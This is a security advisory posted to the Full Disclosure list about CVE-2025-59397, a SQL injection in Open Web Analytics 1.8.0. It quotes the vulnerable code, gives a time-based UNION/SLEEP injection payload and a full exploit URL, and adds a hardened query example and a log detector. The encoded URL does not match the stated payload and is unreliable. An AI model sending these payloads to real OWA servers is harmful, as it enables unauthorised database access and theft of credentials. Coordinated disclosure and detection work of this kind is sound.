Message-ID: <DB3PR10MB6809708DAAA0DE9CC259F026D0E1A@DB3PR10MB6809.EURPRD10.PROD.OUTLOOK.COM>
Date: Wed, 8 Oct 2025 12:19:56 +0000
From: Seralys Research Team via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2025-59397 - Open Web Analytics SQL Injection
Seralys Security Advisory | https://www.seralys.com/research
======================================================================
Title: SQL Injection Vulnerability
Product: Open Web Analytics (OWA)
Affected: Confirmed on 1.8.0 (older versions likely affected)
Fixed in: 1.8.1
Vendor: Open Web Analytics (open-source)
Discovered: August 2025
Severity: HIGH
CWE: CWE-89: SQL Injection
CVE: CVE-2025-59397
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Discovered by: Philippe Caturegli & Mohamed Mahmoudi (Seralys)
======================================================================
Overview
--------
Open Web Analytics (OWA) contains a SQL injection vulnerability in
its query builder (`owa_db.php`). When handling constraints, the
parameter `v[value]` is concatenated into SQL statements without
sanitization.
The vulnerability exists specifically in the logic for the operators `=@`
and `!@`, where user-supplied input is inserted directly into a SQL
string.
An attacker with a low-privileged account can supply crafted input
that results in execution of arbitrary SQL queries.
======================================================================
Technical Details
-----------------
Affected Source File:
---------------------
owa_db.php (line 597 and line 601)
https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/release-1.8.0/owa_db.php#L596
Relevant code excerpt:
    foreach ($params as $k => $v) {
        switch (strtolower($v['operator'])) {
            [...]
            case '=@':
                $constraint .= sprintf("LOCATE('%s', %s) > 0", $v['value'],
                    $this->prepare( $v['name'] ) );
                break;
            case '!@':
                $constraint .= sprintf("LOCATE('%s', %s) = 0", $v['value'],
                    $this->prepare( $v['name'] ) );
                break;
            [...]
        }
    }
    return $constraint;
Notes:
- `v['value']` is taken from user-controlled request parameters.
- `v['value']` is directly embedded inside a single-quoted string.
- Because `LOCATE()` arguments are comma-separated and the constraint
  parser also splits on commas, commas inside the injected SQL must be
  preserved (e.g. encoded as the HTML entity `&#44;`) so they are not
  split off by the parser before the SQL is constructed.
- Exploitation requires a valid account that can trigger queries with
`owa_constraints`.
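As an added illustration (not code from the OWA project or from this advisory), the unsafe pattern of the excerpt next to a hardened builder that keeps user data out of the SQL text and binds it through the driver instead. The function names, the column allow-list, the `owa_request` table name and the sample values are assumptions made for this example.

```php
<?php
// Added example, not code from the OWA project. The function names, the
// column allow-list, the table name and the sample values are assumptions.

// Unsafe pattern, as in the owa_db.php excerpt: the user-supplied value is
// spliced into the SQL text, so a single quote in it ends the literal and the
// rest of the value is parsed as SQL.
function buildConstraintUnsafe(array $v): string
{
    switch (strtolower($v['operator'])) {
        case '=@':
            return sprintf("LOCATE('%s', %s) > 0", $v['value'], $v['name']);
        case '!@':
            return sprintf("LOCATE('%s', %s) = 0", $v['value'], $v['name']);
    }
    throw new InvalidArgumentException('unsupported operator');
}

// Hardened pattern: the SQL text contains only a placeholder; the value goes
// into a bind list that the driver sends separately as data, and the column
// name is checked against an allow-list because identifiers cannot be bound.
const ALLOWED_COLUMNS = ['site_id', 'date', 'page_title'];   // assumed list

function buildConstraintSafe(array $v, array &$binds): string
{
    $ops = ['=@' => '> 0', '!@' => '= 0'];
    $op = strtolower($v['operator']);
    if (!isset($ops[$op])) {
        throw new InvalidArgumentException('unsupported operator');
    }
    if (!in_array($v['name'], ALLOWED_COLUMNS, true)) {
        throw new InvalidArgumentException('unknown column');
    }
    $binds[] = (string) $v['value'];
    return sprintf('LOCATE(?, %s) %s', $v['name'], $ops[$op]);
}

// Running the hardened constraint through PDO: the statement text is the same
// for every value, and $binds travels as parameters, never as SQL.
function countMatches(PDO $pdo, array $constraint): int
{
    $binds = [];
    $where = buildConstraintSafe($constraint, $binds);
    $stmt = $pdo->prepare("SELECT COUNT(*) FROM owa_request WHERE $where");
    $stmt->execute($binds);
    return (int) $stmt->fetchColumn();
}

// Demonstration with constructed input values.
$benign  = ['name' => 'site_id', 'operator' => '=@', 'value' => 'example'];
$hostile = ['name' => 'site_id', 'operator' => '=@', 'value' => "x') OR 1=1 -- "];

echo buildConstraintUnsafe($benign), "\n";
// LOCATE('example', site_id) > 0
echo buildConstraintUnsafe($hostile), "\n";
// LOCATE('x') OR 1=1 -- ', site_id) > 0   <- the value has become SQL

$binds = [];
echo buildConstraintSafe($hostile, $binds), ' with binds ', json_encode($binds), "\n";
// LOCATE(?, site_id) > 0 with binds ["x') OR 1=1 -- "]
```

The allow-list is the part that cannot be replaced by binding: `LOCATE(?, ?)` would compare against the literal column name, so the identifier has to be validated rather than parameterised.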
======================================================================
Proof of Concept
-----------------
Steps:
1) Insert the `=@` or `!@` operator.
2) Close the string.
3) Syntactically complete the earlier `LOCATE()` call with two arguments
   (note: to preserve commas through the constraint parser, they can be
   encoded as `&#44;`).
4) Inject a time-based payload.
5) Comment out the rest of the server-constructed fragment.
Payload example:
owa_constraints=siteId=@...my'&#44;'dummy') UNION SELECT 1&#44;2&#44;
SLEEP(5)--
Payload example (url encoded):
owa_constraints=siteId%3d%40dummy%27%26%23%34%34%3b%27dummy%27%29%20
UNION%20SELECT%201%26%23%34%34%3b2%26%23%34%34%3bSLEEP%285%29--%20
Full URL:
http://owa_site/api/index.php?owa_siteId=owa_period=last_seven_days&
owa_do=reports&owa_module=base&owa_version=v1&owa_metrics=visits,pageViews,
bounceRate&owa_dimensions=date&owa_sort=date&owa_format=json&
owa_constraints=siteId%3D%3D40dummy%27%20UNION%20SELECT%201%2C%31%2C%33%2C
%34%33%2C%31%2C%36%2C%31%34%33bSLEEP%285%29--%20&owa_nonce=<nonce>
======================================================================
Impact
------
- Authenticated SQL injection in OWA queries
- Database data exfiltration possible
- Risk of privilege escalation through extracted credentials
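For teams reviewing access logs while the upgrade is scheduled, an added example (not part of this advisory or of OWA) that flags requests whose `owa_constraints` parameter carries HTML-entity-encoded characters, quotes or SQL keywords. Legitimate constraint values are identifiers and numbers, so any of these is worth a closer look. The log lines are constructed for the example and follow the common combined log format.

```php
<?php
// Added example, not code from the advisory or the OWA project. The log lines
// are constructed; the request-line layout follows the combined log format.

// Return the reasons a request's owa_constraints parameter looks suspicious,
// or an empty array for a clean (or absent) constraint.
function inspectConstraints(string $logLine): array
{
    $findings = [];
    // Pull the query string out of the quoted request line.
    if (!preg_match('#"(?:GET|POST) [^"?\s]*\?([^"\s]*)#', $logLine, $m)) {
        return $findings;
    }
    parse_str($m[1], $params);          // percent-decodes each parameter
    $raw = (string) ($params['owa_constraints'] ?? '');
    if ($raw === '') {
        return $findings;
    }
    // HTML entities (e.g. &#44; for a comma) have no place in a filter value;
    // they are one way to carry a comma past a comma-delimited parser.
    if (preg_match('/&#(?:\d+|x[0-9a-f]+);/i', $raw)) {
        $findings[] = 'HTML-entity-encoded characters';
    }
    // Judge the rest on the value as the application would see it.
    $decoded = html_entity_decode($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if (strpbrk($decoded, "'\"") !== false) {
        $findings[] = 'quote character';
    }
    if (preg_match('/\b(?:union|select|sleep|benchmark)\b|--|\/\*/i', $decoded)) {
        $findings[] = 'SQL keyword or comment sequence';
    }
    return $findings;
}

// Constructed sample log lines: two ordinary report requests and one carrying
// a constraint shaped like the one described in this advisory.
$sampleLog = [
    '10.0.0.5 - - [08/Oct/2025:12:00:01 +0000] "GET /api/index.php?owa_do=reports&owa_module=base&owa_constraints=siteId%3D%3D1 HTTP/1.1" 200 1842',
    '10.0.0.9 - - [08/Oct/2025:12:00:07 +0000] "GET /api/index.php?owa_do=reports&owa_module=base&owa_constraints=siteId%3D%40x%27%26%23%34%34%3B%27y%27%29%20UNION%20SELECT%201--%20 HTTP/1.1" 200 1842',
    '10.0.0.5 - - [08/Oct/2025:12:00:09 +0000] "GET /api/index.php?owa_do=reports&owa_format=json HTTP/1.1" 200 1842',
];

foreach ($sampleLog as $line) {
    $findings = inspectConstraints($line);
    if ($findings !== []) {
        echo substr($line, 0, 8), ' suspicious owa_constraints: ', implode(', ', $findings), "\n";
    }
}
// 10.0.0.9 suspicious owa_constraints: HTML-entity-encoded characters, quote character, SQL keyword or comment sequence
```

The entity check is the most specific of the three signals for this bug, because a browser or the OWA front end never emits `&#44;` inside a constraint; the quote and keyword checks are generic and will also surface other injection attempts against the same parameter.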
======================================================================
Vendor Response
---------------
The Open Web Analytics project acknowledged the report and implemented
a fix in commit 1e55315. The issue was resolved in release 1.8.1.
Users are advised to upgrade to this version to address CVE-2025-59397.
======================================================================
Timeline
--------
- 2025-08-19: Vulnerability discovered
- 2025-08-20: Advisory drafted
- 2025-08-20: Vendor contact initiated
- 2025-08-24: Vendor acknowledged receipt and initiated coordination
- 2025-09-01: Fix committed to GitHub (1e55315)
- 2025-09-07: Release 1.8.1 published with the security fix
- 2025-09-24: Coordinated disclosure
======================================================================
About Seralys
-------------
Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and
security assessments.
https://www.seralys.com
======================================================================
Acknowledgments
---------------
Special shoutout to our fellow researchers at BastardLabs. \m/
======================================================================
Disclaimer
----------
This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.
EOF